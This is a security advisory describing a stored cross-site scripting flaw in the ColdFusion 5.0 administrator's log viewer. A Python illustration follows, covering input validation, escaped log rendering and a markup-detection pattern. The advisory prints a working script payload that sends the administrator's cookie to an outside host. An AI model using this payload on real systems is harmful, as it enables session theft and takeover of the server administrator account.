Cross-site scripting vulnerability in CF 5.0.

This issue was brought up to Macromedia on July 22nd, 2002. Macromedia issued a fix to me, but I have not seen the fix available to the public.

The ColdFusion administrator allows you to view your application log via your web browser. Under certain conditions, it is possible to remotely alter ColdFusion's application log. Take the following code:

    <CFQUERY NAME="qProducts" DATASOURCE="#datasrc#">
        SELECT * FROM Products WHERE ProductId = #int(url.productid)#
    </CFQUERY>

If the INT function encounters a value that is not numeric, it throws an exception and writes the value that was passed to application.log. Should an unsuspecting administrator view the log file via their web browser, any script contained in that logged value could be executed. Consider what happens if url.productid (from the above example) were passed in as:

    <iframe name="frame1" width="0" height="0"></iframe>
    <script>document.frame1.location="http://www.domain.com/index.cfm?stealcookie=" + document.cookie</script>

This would enable an attacker to steal the value of the ColdFusion administrator's cookie. Decrypting the ColdFusion admin's password is well documented, so this poses a mild to moderate threat to server security.

NOTE: there are dozens of other functions that throw exceptions similar to the INT function.
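The log-to-browser path described above, modelled in Python as an added example (not code from the original post or from ColdFusion itself): lookup_product reproduces the pattern in which a failed numeric conversion writes the raw parameter to the log, render_log_unsafe and render_log_safe are a constructed stand-in for the administrator's log viewer before and after output encoding, and lookup_product_hardened and find_markup_in_log show the input-validation and detection side. All function names and sample values are constructed for this illustration.

```python
import html
import re

# Constructed sample values for url.productid, as a browser might send them.
SAMPLE_IDS = ["42", "<script>alert(1)</script>", "abc"]

def lookup_product(productid, log):
    """Mirrors the CFQUERY pattern: int() raises on a non-numeric value and the
    exception handler writes the raw value to the application log."""
    try:
        pid = int(productid)
    except ValueError:
        # Like application.log in the post: the offending input is logged verbatim.
        log.append(f"Error: could not convert '{productid}' to an integer")
        return "error"
    return f"SELECT * FROM Products WHERE ProductId = {pid}"

PRODUCT_ID = re.compile(r"[0-9]{1,9}")

def lookup_product_hardened(productid, log):
    """Validate before converting, and never echo the raw value into the log."""
    if not PRODUCT_ID.fullmatch(productid):
        log.append(f"Rejected productid of {len(productid)} chars: not an unsigned integer")
        return "error"
    return f"SELECT * FROM Products WHERE ProductId = {int(productid)}"

def render_log_unsafe(log):
    # The vulnerable viewer: log text is concatenated straight into the HTML page.
    return "<pre>" + "\n".join(log) + "</pre>"

def render_log_safe(log):
    # Hardened viewer: HTML-escape each entry at output time, so markup that did
    # reach the log is displayed as text instead of being interpreted by the browser.
    return "<pre>" + "\n".join(html.escape(line, quote=True) for line in log) + "</pre>"

MARKUP = re.compile(r"<\s*/?[a-z]|javascript:", re.IGNORECASE)

def find_markup_in_log(log):
    """Detection: return log entries containing HTML tags or script URLs, which a
    numeric URL parameter should never have produced."""
    return [line for line in log if MARKUP.search(line)]

if __name__ == "__main__":
    log = []
    for pid in SAMPLE_IDS:
        lookup_product(pid, log)
    print(render_log_unsafe(log))   # markup survives intact
    print(render_log_safe(log))     # markup is escaped
    print(find_markup_in_log(log))  # the injected entry is flagged
```

The same two controls apply to the real case: validate url.productid before it reaches INT (or any other throwing function), and HTML-encode log entries wherever the administrator's viewer renders them.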